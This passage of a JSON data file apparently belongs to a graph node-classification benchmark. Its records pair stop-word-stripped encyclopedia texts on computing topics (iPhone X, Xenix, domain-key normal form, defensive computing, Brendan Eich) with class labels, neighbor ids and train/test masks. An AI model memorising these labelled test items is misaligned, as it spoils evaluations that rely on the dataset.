longer battery life ability see light bar top touchpad released september 15 2016 initial controller version light bar permanently illuminated bright-colored light potential light pollution darkened playing rooms well interest extending battery life led inquiries whether light bar could switched users required game sony executive shuhei yoshida initially responded negative july 2013 though videogame developers option disable light game early 2014 company announced future update would allow light bar dimmed enabled system update 1.70 april 2014 original dualshock 4 cuh-zct1 available jet black glacier white urban camouflage wave blue black back magma red black back gold silver steel black newer dualshock 4 cuh-zct2 currently available jet black glacier white green camouflage blue camouflage wave blue blue back magma red red back gold silver sunset orange crystal red crystal blue crystal steel black midnight blue metallic copper alpine green berry blue also dualshock 4 exclusive least initially console bundles like 20th anniversary edition gun metal metal gear solid v star wars battlefront monster hunter world god war gran turismo sport days play marvel spider-man 500 million limited edition ps4 pro dualshock controller given emmy award peripheral development technological impact video game controllers national academy television arts sciences january 8 2007 sony initially reported sixaxis received award issuing correction",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      1091,
      9543,
      10056,
      6909,
      6732,
      10316,
      6738,
      3923,
      6873,
      859,
      4060,
      1501,
      607,
      359,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 6782,
    "label": 1,
    "text": "Domain-key_normal_form:domain-key normal form domain-key normal form dk/nf normal form used database normalization requires database contains constraints domain constraints key constraints domain constraint specifies permissible values given attribute key constraint specifies attributes uniquely identify row given table domain/key normal form achieved every constraint relation logical consequence definition keys domains enforcing key domain restraints conditions causes constraints met thus avoids non-temporal anomalies reason use domain/key normal form avoid general constraints database clear domain key constraints databases easily test domain key constraints attributes general constraints however would normally require special database programming form stored procedures often trigger variety expensive maintain expensive database execute therefore general constraints split domain key constraints much easier build database domain/key normal form convert lesser databases may contain numerous anomalies however successfully building domain/key normal form database remains difficult task even experienced database programmers thus domain/key normal form eliminates problems found databases tends costly normal form achieve however failing achieve domain/key normal form may carry long-term hidden costs due anomalies appear databases adhering lower normal forms time third normal form boyce–codd normal form fourth normal form fifth normal form special cases domain/key normal form either functional multi-valued join dependencies converted super keys domains normal forms unconstrained domain constraints satisfied however transforming higher normal form domain/key normal form always dependency-preserving transformation therefore always possible violation dknf occurs following table constraint linking wealthy person type net worth dollars even though deduce one constraint dictates eccentric millionaire evil millionaire net worth 1,000,000 999,999,999 inclusive eccentric billionaire evil billionaire net worth 1,000,000,000 higher constraint neither domain constraint key constraint therefore rely domain constraints key constraints guarantee inconsistent wealthy person type net worth dollars combination make way database dknf violation could eliminated altering wealthy person type domain make consist two values 'evil 'eccentric wealthy person status millionaire billionaire implicit net worth dollars useful information lost relationships impossible express foreign keys obvious violations dknf example parent id attribute points one several referenced tables depending second parent type attribute violates dknf",
    "neighbors": [
      5792,
      5794,
      5795,
      2022,
      6983,
      2024,
      2025,
      2026,
      7080,
      10632,
      4281,
      3004
    ],
    "mask": "None"
  },
  {
    "node_id": 6783,
    "label": 2,
    "text": "IPhone_X:iphone x iphone x roman numeral x pronounced ten smartphone designed developed marketed apple inc eleventh generation iphone announced september 12 2017 alongside iphone 8 iphone 8 plus steve jobs theater apple park campus release date – november 3 2017 – marked iphone series tenth anniversary iphone x intended showcase apple considered technology future using glass stainless-steel form factor beze-less design shrinking bezels chin unlike many android phones first iphone use oled screen offer wireless charging home button replaced new type password authentication called face id using advanced technologies scan user face unlock device face-recognition capability also enabled emojis animated following user expression animoji bezel-less design iphone user interaction changed significantly using gestures navigate operating system rather home button used previous iphones time november 2017 launch price tag us 999 also made expensive iphone ever even higher prices internationally due additional local sales import taxes iphone x received mixed reviews display build quality universally praised camera also scored positively tests phone received particularly polarized reception due sensor housing notch top screen introduction all-new authentication method notch heavily mocked users social media although app developers responded either neutrally positively changes brought user experience apps games reviewers mixed reactions condemning others acknowledging unusual first moments use getting accustomed presence face id facial recognition praised simple setup criticized requiring direct eyes screen though option disabled within system preferences along iphone 6s plus variant iphone se iphone x discontinued september 12 2018 following announcement new iphone xs iphone xs max iphone xr devices result shelf life 10 months iphone x shortest ever tenure flagship device history iphone november 22 2018 apple reportedly resumed production iphone x due weak sales successors iphone x remains discontinued february 2019 apple started selling refurbished models 769 technology behind iphone x development five years far back 2012 rumors drastic iphone redesign began circulating around time iphone 7 announcement third quarter 2016 intensified homepod firmware leak july 2017 suggested apple would shortly release phone nearly bezel-less design lack physical home button facial recognition new features near-final development version ios 11 operating system also leaked september 2017 confirming new design features august 31 2017 apple invited journalists september 12 press event first public event held steve jobs theater company new apple park campus cupertino california iphone x unveiled keynote us 999 starting price expensive iphone launch price price even higher international markets due currency fluctuations import fees sales taxes unlocked version phone made available purchase united states december 5 2017 april 2018 federal communications commission divulged images unreleased gold-colored iphone x model opposed space gray silver color options iphone x ships divulged initial plans release gold option device however put hold due production issues apple released revised b model iphone x fixed nfc issues users japan china america iphone x 5.8-inch oled color-accurate screen supports dci-p3 wide color gamut srgb high dynamic range contrast ratio 1,000,000:1 super retina display true tone technology found ipad pro uses ambient light sensors adapt display white balance surrounding ambient light although iphone x feature promotion technology used displays second-generation ipad pro display delivers refresh rate 120hz sample touch input 120hz oled screen technology known negative trend burn-in effects particular elements consistently screen long periods time leave faint trace even new images appear apple acknowledged oled screens excluded issue writing support document also expected behavior greg joswiak apple vice president product marketing told tom guide oled panels apple used iphone x engineered avoid oversaturation colors using oled panels typically results made color adjustments subpixel -level refinements crisp lines round corners out-of-warranty servicing damages relating manufacturing defects screen repairs iphone x cost us 279 damage repairs cost us 549 iphone x two color options silver space gray sides phone composed surgical-grade stainless steel improve durability front back made glass design intended ip67 water dust resistant iphone x contains apple a11 bionic system-on-chip also used iphone 8 8 plus six-core processor two cores optimized performance 25 faster a10 fusion processor along four cores optimized efficiency 70 faster previous generation also features first apple-designed graphics processing unit neural engine powers artificial intelligence accelerator face id replaces touch id authentication system facial recognition sensor consists two parts romeo module projects 30,000 infrared dots onto user face juliet module reads pattern pattern sent secure enclave a11 bionic chip confirm match phone owner face default system work eyes closed effort prevent unauthorized access requirement disabled settings iphone x two cameras rear one 12-megapixel wide-angle camera f/1.8 aperture support face detection high dynamic range optical image stabilization capable capturing 4k video 24 30 60 frames per second 1080p video 30 60 120 240 frames per second secondary telephoto lens features 2× optical zoom 10× digital zoom aperture f/2.4 optical image stabilization portrait mode capable producing photos specific depth-of-field lighting effects also quad-led true tone flash 2× better light uniformity front phone 7-megapixel truedepth camera f/2.2 aperture features face detection hdr capture 1080p video 30 frames per second 720p video 240 frames per second exclusively allows use animoji animated emojis placed top user face intelligently react user facial expressions iphone x also supports qi-standard wireless charging tests conducted macrumors iphone x charging speed varies significantly depending types cables powerbanks adapters wireless chargers used due different screen layout ios developers required update apps make full use additional screen real estate changes include rounded corners sensor notch top screen indicator area bottom accessing home screen apple published human interface guidelines document explain areas focus discouraged developers attempting mask call special attention new changes additionally text within app needs configured properly reference face id rather touch id authentication technology used iphone x anticipation release phone major apps quickly updated support new changes brought iphone x though required changes cause delayed app updates major apps traditional home button found previous devices iphone lineup removed entirely replaced touch-based gestures wake device users tap display use side button access home screen users must swipe bottom display access multitasking window users must swipe similarly method accessing home screen stop finger middle screen causing app carousel appear iphone x rear camera received overall rating 97 dxomark camera testing company short highest score 99 awarded samsung galaxy s9+ smartphone google pixel 2 received rating 98 consumer reports non-profit independent organization aiming write impartial reviews consumer products ranked iphone x iphone 8 iphone 8 plus well samsung galaxy s8 s8+ note 8 due less durability shorter battery life although praised x camera highest-rated smartphone camera ever tested nilay patel verge praised display calling polished tight clean bright colorful criticized repeated lack headphone jack device fragility despite apple claims durability sensor notch calling ugly patel highlighted fact apps required updates fit new screen writing popular apps received updates time review resulting apps huge black borders resembling iphone 8 especially criticized positioning sensor notch holding phone landscape mode causing notch go somewhat forgettable element top status bar giant interruption side screen cameras given positive feedback maintaining detail low-light patel particularly praised animoji calling probably single best feature iphone x writing work work incredibly well finally wrote face id whole foundation iphone x stated generally works great though acknowledging occasional misstep users must actively move phone closer face compensate specifically criticized limited range face id authentication working holding phone 25–50 centimeters away face chris velazco engadget also praised display writing experience sensor notch goes weird first noticeable due action videos usually happening center build quality given particular acclaim called beautifully made device construction seamlessly connects front back glass stainless-steel frame velazco noted new gesture-based interaction takes time getting used particularly control center moved bottom top right display camera processor performance battery life also given positive thoughts heavily negative review dennis green business insider significantly criticized impossible one-handed use iphone x writing new gestures use phone swiping top access notifications control center work using phone one hand due able reach top review sparked outrage among twitter users many used condescending tones green reasoned n't know whether anger directed toward loyalty apple justify choice spend 1,000 phone obvious much criticism came people never used phone macworld roman loyola praised face id authentication system writing setup process easy system integration seamless touch id fingerprint authentication past said loyola note half-second slower unlocking time touch id well needing look directly screen making impossible unlock phone next user desk face id raised concerns regarding possibility law enforcement accessing individual phone pointing device user face united states senator al franken asked apple provide information security privacy face id day announcement apple responding highlighting recent publication security white paper knowledge base detailing answers inconsistent results shown testing face id identical twins tests showing system managing separate two tests failed however despite apple promise increased security face id compared touch id fingerprint authentication system multiple media reports indicating otherwise verge noted courts united states granted different fifth amendment rights united states constitution biometric unlocking systems opposed keycodes keycodes considered testimonial evidence based contents users thoughts whereas fingerprints considered physical evidence suspects ordered unlock phones via fingerprint many attempts break face id sophisticated masks attempted though failed week iphone x released vietnamese security firm bkav announced blog post successfully created 150 mask tricked face id though wired noted bkav technique proof-of-concept rather active exploitation risk technique requiring detailed measurement digital scan iphone owner face putting real risk danger targets espionage world leaders additionally reuters reported early november 2017 apple would share certain facial data users third-party app developers precise selfie filters fictional game characters mirror real-world user facial expressions although developers required seek customer permission allowed sell data others create profiles users use data advertising limited rough map rather full capabilities still get access 50 kinds facial expressions american civil liberties union aclu center democracy technology raised privacy questions apple enforcement privacy restrictions connected third-party access apple maintaining app store review processes effective safeguards rough map facial data third-parties access also enough unlock device according reuters however overall idea letting developers access sensitive facial information still satisfactorily handled according jay stanley senior policy analyst aclu stanley telling reuters privacy issues around use sophisticated facial recognition technology unlocking phone overblown … real privacy issues access third-party developers much debate iphone x revolved around design sensor housing dubbed notch media top display outline described visually disgusting element verge posted report focusing public criticism people mocking apple odd design choice every reviewer equally negative opinions third-party ios developers interviewed ars technica said despite work restructuring design elements apps notch cause problems even arguing notch good push simplify designs two weeks iphone x release apple approved notch remover app app store places black bars across top home screen make notch visually disappear approval done despite company user interface guidelines discouraging developers specifically masking design iphone x first device notch–both essential phone sharp aquos s2 announced display notch–but iphone x arguably popularized november 2017 early adopters new phone reported experiencing activation issues certain cellular carriers notably announced within hours issue fixed end spokesperson verizon carrier told media none customers affected despite reports problems november 2017 iphone x users reported reddit device screen would become unresponsive experiencing rapid temperature drops apple released ios 11.1.2 update november 16 2017 fixing issue forbes contributor gordon kelly reported march 2018 1,000 users experienced problems using camera flash cold weather problem still persisting ios 11.3 beta 1 apple engaged legal battle qualcomm allegedly anti-competitive practices dual-sourcing cellular modem chips reduce reliance semiconductor manufacturer starting iphone 7 2016 apple used half qualcomm modem chips half intel professional measurement tests performed wireless signal testing firm cellular insights indicated previous-gen iphone 7 qualcomm chips outperform intel lte download speeds 67 faster weak signal conditions resulting sources recommending purchase unlocked iphone x one bought cellular carrier verizon order get models featuring faster qualcomm modem additionally cnet reported september 2017 new iphone models including x 8 8 plus ability connect next-generation wireless lte data connection despite 10 new android devices including flagships main smartphone competitor samsung capability apple new smartphones support lte advanced theoretical peak speed 500 megabits per second android models ability connect gigabit lte allowing theoretical speeds 1 gigabit per second doubling apple speed releasing iphone x japan china customers experienced issues related phone nfc trying access public transit smart card readers april 2018 apple released revision iphone x included vastly improved nfc chip solved problem nfc reader errors cases previously around 1 3 nfc attempts would fail initial reports issue also affected users america",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      2630,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      1121,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      7806,
      10365,
      10878,
      4741,
      9863,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      9035,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      5520,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Train"
  },
  {
    "node_id": 6784,
    "label": 1,
    "text": "Data_item:data item data item describes atomic state particular object concerning specific property certain time point collection data items object time forms object instance table row type complex information broken elementary data items atomic state data items identified object property p time value v function p v f p values typically represented symbols like numbers texts images sounds videos others values necessarily atomic complexity value depends complexity property time component looking databases xml files object usually identified object name type object identifier part data properties defined columns table row properties object instance tags xml often time explicitly expressed attribute applying complete data set data collections provide time instance level time series column level even attribute/property level",
    "neighbors": [
      3146,
      6959
    ],
    "mask": "None"
  },
  {
    "node_id": 6785,
    "label": 4,
    "text": "Symantec_Online_Backup:symantec online backup symantec online backup online remote backup service provides businesses system backing storing computer files internet released february 2008 symantec protection network platform symantec online backup example cloud computing saas software service sales symantec online backup discontinued january 2010",
    "neighbors": [
      9569,
      4194,
      6565,
      1801,
      6797,
      7983,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 6786,
    "label": 4,
    "text": "Defensive_computing:defensive computing defensive computing form practice computer users help reduce risk computing problems avoiding dangerous computing practices primary goal method computing able anticipate prepare potentially problematic situations prior occurrence despite adverse conditions computer system mistakes made users achieved adherence variety general guidelines well practice specific computing techniques strategies defensive computing could divided two categories network security backup restoration data users put computers risk accessing internet networks use either allows others gain access user system important information implementing certain strategies defensive users aim reduce risk associated network access firewall collection security measures protects computer harmful inbound outbound traffic internet prevents unauthorized access computer systems security measures integrated form special software runs autonomously either individual computer systems externally built software within routers modems firewall software protect computers sending unauthorized harmful outbound traffic important defensive computing strategy seek implement quality firewall software filters inbound outbound traffic basic strategy defensive computer users install use anti-malware software firewalls may completely protect computer malicious software may able get firewall onto system anti-malware anti-virus anti-phishing email filtering software offer protection harmful software reside within computer amount malicious software available internet steadily increasing important defensive users use anti-malware effective easily updated order combat new strains malicious software developed side anti malware contains serious vulnerabilities malware could use vulnerabilities anti-malware launch malicious code anti-malware works scanning files network connections known signatures signatures never date able scan network connections encryptions ssl/tls need bypassed even broken anti-malware software monitoring emails anti-malware opens attachments analysis bug scanner used starting point malware attackers need send malware mailbox scanned automatically questionable malware scanners even useful ex mozilla developer rober o'callahan writes blog anti malware software disabled except windows defender important aspect defensive computing users skeptical data access via internet malicious software exist multitude different forms many misleading general computer users even anti-malware software defensive users think critically information access reduce chances downloading spreading malicious software strategies include scanning email attachments prior opening manually filtering suspicious emails inboxes users aware persuasive subject lines headings emails address may actually contain malicious software spam mislead users false advertisement resulting identity theft defensive users scan files download prior opening also configure computers show file extensions revealing potentially dangerous files appear harmless skepticism also applied websites visited users emails users led false advertisements also malicious software unknowingly downloaded infect computer visiting certain website despite efforts defensive computer user loss important data occur due malware power outages equipment failure general misuse although loss data completely prevented defensive users take steps minimize amount data lost restore systems previous state defensive strategy unintentional data loss regular backup important files users make multiple copies important data store either computer another device compact disc external hard drive users also upload important files internet provided access internet storage services operating systems give users option performing procedure restores computer predetermined state option available user obtain appropriate restoration software system event system failure serious case data loss user restore lost changed files remove malicious files previously exist",
    "neighbors": [
      3072,
      5764,
      7044,
      10245,
      10756,
      9227,
      9356,
      9102,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      9233,
      10392,
      1690,
      3867,
      9242,
      10141,
      5281,
      9761,
      2213,
      3366,
      5542,
      8998,
      9256,
      939,
      300,
      9771,
      1970,
      4023,
      10297,
      3643,
      6588,
      7739,
      8637,
      9791,
      1088,
      3395,
      8387,
      4165,
      2508,
      3032,
      4314,
      7515,
      4344,
      9187,
      3941,
      11621,
      107,
      877,
      9591,
      3320,
      2041,
      5245,
      2558,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 6787,
    "label": 2,
    "text": "Xenix:xenix xenix discontinued version unix operating system various microcomputer platforms licensed microsoft corporation late 1970s santa cruz operation sco later acquired exclusive rights software eventually replaced sco unix known sco openserver mid-to-late 1980s xenix common unix variant measured according number machines installed microsoft chairman bill gates said 1996 long time microsoft highest-volume unix license bell labs developer unix part regulated bell system could sell unix directly end customers instead licensed software others microsoft expected unix would operating system future personal computers became powerful enough purchased license version 7 unix 1978 announced august 25 1980 would make available 16-bit microcomputer market microsoft able license unix name company gave original name microsoft called xenix universal operating environment sell xenix directly end users licensed software oems ibm intel management systems development tandy altos sco siemens sinix ported proprietary computer architectures 1981 microsoft said first version xenix close original unix version 7 source pdp-11 later versions incorporate fixes improvements company stated intended port operating system zilog z8000 series digital lsi-11 intel 8086 80286 motorola 68000 possibly numerous processors provide microsoft full line system software products including basic languages first port z8001 16-bit processor first customer ship january 1981 central data corporation illinois followed march 1981 paradyne corporation z8001 product first 8086 port altos computer systems non-pc-compatible 8600-series computers first customer ship date q1 1982 intel sold complete computers xenix intel system 86 brand specific models 86/330 86/380x also offered individual boards made computers isbc brand included processor boards like isbc 86/12 also mmu boards isbc 309 first intel xenix systems shipped july 1982 tandy doubled xenix installed base made trs-xenix default operating system trs-80 model 16 68000-based computer early 1983 largest unix vendor 1984 seattle computer products also made pc-incompatible 8086 computers bundled xenix like gazelle ii used s-100 bus available late 1983 early 1984 also port ibm system 9000 sco initially worked pdp-11 port v7 called dynix struck agreement microsoft joint development technology exchange xenix 1982 1984 port 68000-based apple lisa 2 jointly developed sco microsoft first shrink-wrapped binary product sold sco 1983 oem directory microsoft said difficulty porting various 8086 z8000-based machines lack standardized memory management unit protection facilities hardware manufacturers compensated designing hardware ensuing complexity made extremely difficult impossible small manufacturer develop computer capable supporting system xenix scratch xenix kernel must custom-tailored new hardware environment generally available port unmapped intel 8086/8088 architecture done santa cruz operation around 1983 sco xenix pc xt shipped sometime 1984 contained enhancement 4.2bsd also supported micnet local area networking later 286 version xenix leveraged integrated mmu present chip running 286 protected mode 286 xenix accompanied new hardware xenix oems example sperry pc/it ibm pc clone advertised capable supporting eight simultaneous dumb terminal users version xenix 2.0 still based version 7 unix version 3.0 upgraded unix system iii code base 1984 intel manual xenix 286 noted xenix kernel 10,000 lines time followed system v.2 codebase xenix 5.0 a.k.a xenix system v microsoft hopes xenix become preferred choice software production exchange company stated 1981 microsoft referred ms-dos single-user single-tasking operating system advised customers wanted multiuser multitasking support buy xenix planned time improve ms-dos would almost indistinguishable single-user xenix xedos would also run 68000 z8000 lsi-11 would upwardly compatible xenix byte 1983 described multi-user ms-dos future microsoft chris larson described ms-dos 2.0 xenix compatibility second important feature company advertised dos xenix together listing shared features single-user os multi-user multi-tasking unix-derived operating system promising easy porting started selling system v however breakup bell system microsoft believing could compete unix developer decided abandon xenix decision immediately transparent led term vaporware agreed ibm develop os/2 xenix team together best ms-dos developers assigned project 1987 microsoft transferred ownership xenix sco agreement left microsoft owning slightly less 20 sco amount prevented companies disclose exact amount event sco ipo microsoft eventually lost interest os/2 well company based high-end strategy windows nt 1987 sco ported xenix 386 processor 32-bit chip securing knowledge microsoft insiders microsoft longer developing xenix xenix system v release 2.3.1 introduced support i386 scsi tcp/ip sco xenix system v/386 first 32-bit operating system available market x86 cpu architecture microsoft continued use xenix internally submitting patch support functionality unix 1987 trickled code base xenix sco unix microsoft said used xenix sun workstations vax minicomputers extensively within company late 1988 internal microsoft email transport done xenix-based 68000 systems 1995–1996 company moved exchange server product sco released sco unix higher-end product based system v.3 offering number technical advances xenix xenix remained product line meantime sun microsystems completed merge xenix bsd sunos system v.3 system v release 4 last version sco xenix/386 system v.2.3.4 released 1991 aside unix base xenix incorporated elements bsd notably vi text editor supporting libraries termcap curses kernel featured original extensions microsoft notably file locking semaphores userland microsoft added visual shell menu-driven operation instead traditional unix shell limited form local networking serial lines rs-232 ports possible micnet software supported file transfer electronic mail although uucp still used networking via modems oems often added modifications xenix system trusted xenix variant initially developed ibm name secure xenix later versions trusted xenix name developed trusted information systems incorporated bell-lapadula model multilevel security multilevel secure interface stu-iii secure communications device stu-iii connection would made available applications running privilege level key loaded stu-iii evaluated formal methods achieved b2 security rating dod trusted computer system evaluation criteria—the second highest rating ever achieved evaluated operating system version 2.0 released january 1991 version 3.0 april 1992 version 4.0 september 1993 still use late 1995",
    "neighbors": [
      2560,
      7682,
      4114,
      6675,
      8725,
      1561,
      10273,
      563,
      7224,
      9784,
      2120,
      6218,
      2132,
      1121,
      1634,
      11363,
      7269,
      6760,
      8301,
      9839,
      633,
      1148,
      640,
      2179,
      132,
      10886,
      6797,
      671,
      7848,
      3241,
      3248,
      10436,
      8395,
      9932,
      4305,
      1247,
      6369,
      9444,
      8423,
      11501,
      5363,
      3323,
      2301,
      11013,
      6412,
      8976,
      3857,
      2322,
      787,
      5397,
      3350,
      1304,
      5406,
      8991,
      10016,
      7460,
      1324,
      6445,
      7983,
      823,
      7483,
      321,
      9027,
      9033,
      2380,
      6476,
      4433,
      8020,
      11604,
      11608,
      8553,
      9067,
      5492,
      2424,
      8576,
      5506,
      9608,
      11145,
      1422,
      7566,
      3477,
      414,
      3487,
      3488,
      6049,
      8098,
      9633,
      5036,
      10156,
      1971,
      2995,
      9141,
      9151,
      9665,
      10692,
      9166,
      4051,
      470,
      3551,
      5600,
      6624,
      4067,
      1508,
      9194,
      4076,
      2545,
      499,
      2035
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6788,
    "label": 7,
    "text": "WestGrid:westgrid westgrid government-funded infrastructure program started 2003 mainly western canada provides institutional research faculty students access high performance computing distributed data storage using combination grid networking collaboration tools westgrid one four partners within umbrella organization compute canada westgrid 14 partner institutions across four provinces british columbia alberta saskatchewan manitoba participating institutions include westgrid also works partnership province optical regional advanced network westgrid network partners include",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6789,
    "label": 0,
    "text": "LENA_Foundation:lena foundation lena developer advanced technology programs accelerate language development children 0-3 close opportunity gaps nonprofit organization uses technology system comprises lena device patented processing software secure cloud-based data access technology used cornerstone programs aimed increasing interactive talk children caregivers implemented community organizations around world lena system also used researchers universities harvard mit brown university stanford university hospitals research institutions used study subjects language builds children brains autism child language acquisition communication deaf hard hearing families lena research foundation nonprofit organization created 2009 donation assets infoture inc. terrance terry judith judi paul also majority owners renaissance learning inc. rli founder renaissance learning terry paul became familiar achievement gap caused differences home language environments 1998 read meaningful differences everyday lives young american children betty hart ph.d. todd risley ph.d. based data gathered intensive longitudinal study meaningful differences revealed number adult words spoken children birth three predicted almost variance children language ability iq age three terry realized help advanced speech recognition technology could streamline data acquisition process provide parents tool easy use could thoroughly chart child natural language environment called lena “ language environment analysis ” 2004 terry started infoture inc. hired team scientists engineers scientific advisors conduct research development work lena system infoture launched pilot version lena system february 2006 february 2009 pauls donated assets infoture gift 2 million create lena research foundation nonprofit organization january 2018 organization updated name lena adopted tagline building brains early talk lena organizational goals based science shows talk conversational engagements child experiences first four years life better academics society based research harvard university showing interactive talk children caregivers one important factors affecting early brain development new research mit published february 2018 confirmed conversational turns responsible activation broca area children lena several programs designed encourage interactive talk children caregivers including programs aimed parents childcare providers home visitors growing body research shows early childhood contains critical periods tasks language acquisition meaning first three years once-in-a-lifetime opportunity development early childhood development drives success school life fostering cognitive skills like attentiveness self-regulation motivation sociability interactive talk — specifically conversational turns — proved key factor stimulating brain growth important years according center developing child harvard university additionally longitudinal research lena found amount conversation children experience ages 18-24 months related iq verbal comprehension language skills adolescence investing early children lead huge social economic gains research shown investments young children lead reductions criminal activity later life 13 percent returns investment annually positive effects last several generations lena stands language environment analysis lena technology provides 25 different metrics natural language environment children including estimates percentile scores adult words spoken child conversational turns child vocalizations system also generates automatic expressive language developmental age percentile score based child voiceprint parent places lena device children lena vest records entire day child sound environment device connected computer special software processes recording data metrics including child exposure verbal stimulation number child utterances information pediatricians child height weight system also generates percentile scores comparing child vocalizations children age lena start program parents uses regular feedback lena system plus 13 weekly group sessions help improve home language environment since introduction 2015 lena start implemented school districts library systems types organizations huntsville ala. san mateo county calif. ames iowa longmont co. minneapolis minn. sites across country texas children hospital first regional healthcare center adopt model lena grow professional development program teachers work early childhood classrooms according lena website lena ’ talk reports teachers focus primarily conversational turns strong measure interactive talk training teachers increase conversational turns important children spend 60 percent time childcare program first piloted escambia county florida launching sites around country lena home supplement existing parent coaching curriculums typically home visitors facilitate use lena system help parents track progress towards increasing interactive talk homes lena sp version lena designed researchers language professionals use lena developmental snapshot based 52-question parent survey assesses expressive receptive language skills provides estimate child developmental age 2 months 36 months",
    "neighbors": [
      10557
    ],
    "mask": "Train"
  },
  {
    "node_id": 6790,
    "label": 3,
    "text": "Palm_V:palm v palm v personal digital assistant made palm computing division 3com functionally similar predecessor palm iii series pdas distinguished sleek design anodized aluminum finish built-in rechargeable battery first palm device palm v design created design firm ideo palm v series succeeded palm m500 series battery contacts back unit short circuited data stored device erased data held kind memory required power retaining data enthusiasts able fix issue adding diode one battery contacts charging device diode open short-circuit diode blocked short circuiting current",
    "neighbors": [
      2308,
      10500,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      1776,
      2420,
      8952,
      7547,
      9598
    ],
    "mask": "Test"
  },
  {
    "node_id": 6791,
    "label": 9,
    "text": "Brendan_Eich:brendan eich brendan eich born july 4 1961 american technologist creator javascript programming language co-founded mozilla project mozilla foundation mozilla corporation served mozilla corporation chief technical officer briefly chief executive officer ceo brave software brendan eich grew palo alto attended ellwood p. cubberley high school graduated class 1979 eich received bachelor degree mathematics computer science santa clara university received master degree 1985 university illinois urbana-champaign eich started career silicon graphics working seven years operating system network code worked three years microunity systems engineering writing microkernel dsp code first mips r4000 port gcc started work netscape communications corporation april 1995 eich originally joined intending put scheme browser netscape superiors insisted language ’ syntax resemble java result language much functionality scheme object orientation self syntax java first version completed ten days order accommodate navigator 2.0 beta release schedule called mocha renamed livescript september 1995 later javascript month eich continued oversee development spidermonkey specific implementation javascript navigator early 1998 eich co-founded mozilla project jamie zawinski others creating mozilla.org website meant manage open-source contributions netscape source code served mozilla chief architect aol bought netscape 1999 aol shut netscape browser unit july 2003 eich helped spin mozilla foundation august 2005 serving lead technologist member board directors mozilla foundation eich became chief technical officer newly founded mozilla corporation meant mozilla foundation for-profit arm eich continued mozilla spidermonkey module javascript engine passed ownership 2011 march 24 2014 eich promoted ceo mozilla corporation gary kovacs john lilly ellen siminoff resigned mozilla board prior appointment anonymously expressing disagreements eich strategy desire ceo experience mobile industry employees mozilla foundation separate organization mozilla corporation tweeted calls resignation reference donation 1,000 california proposition 8 called banning same-sex marriage california eich stood decision fund campaign wrote blog sorry “ causing pain ” pledged promote equality mozilla activists created online campaign eich online dating site okcupid automatically displaying message firefox users information eich donation suggesting users switch different browser although giving link continue firefox others mozilla corporation spoke blogs favor board members wanted stay company different role april 3 2014 eich resigned ceo left mozilla personal blog posted present circumstances effective leader eich ceo brave software internet security company raised 2.5 million early funding angel investors january 20 2016 company released developer versions open-source brave web browser blocked ads trackers included micropayments system offer users choice viewing selected ads paying websites display brave software eich co-created basic attention token bat cryptocurrency designed use brave browser bat launched ico may 31 2017 raised 35 million",
    "neighbors": [
      9736,
      6154,
      9757,
      5677,
      9281,
      7234,
      8262,
      4171,
      84,
      6231,
      603,
      4189,
      8289,
      5219,
      6252,
      10860,
      3184,
      119,
      4728,
      637,
      1664,
      8854,
      11418,
      1698,
      679,
      1713,
      3761,
      1203,
      7861,
      11449,
      5311,
      7871,
      7885,
      7889,
      4822,
      8923,
      7396,
      4844,
      10991,
      8443,
      259,
      1802,
      10507,
      1295,
      7951,
      2836,
      10006,
      4378,
      7455,
      8994,
      803,
      7983,
      11060,
      4920,
      2880,
      10051,
      10057,
      2893,
      11087,
      339,
      9560,
      9561,
      10078,
      10083,
      5483,
      10097,
      7543,
      8057,
      1409,
      8068,
      3462,
      4486,
      8605,
      438,
      1470,
      5054,
      9152,
      5078,
      4056,
      482,
      10722,
      487,
      488,
      8169,
      9195,
      5101,
      494,
      6133,
      5622,
      10744,
      5114,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6792,
    "label": 3,
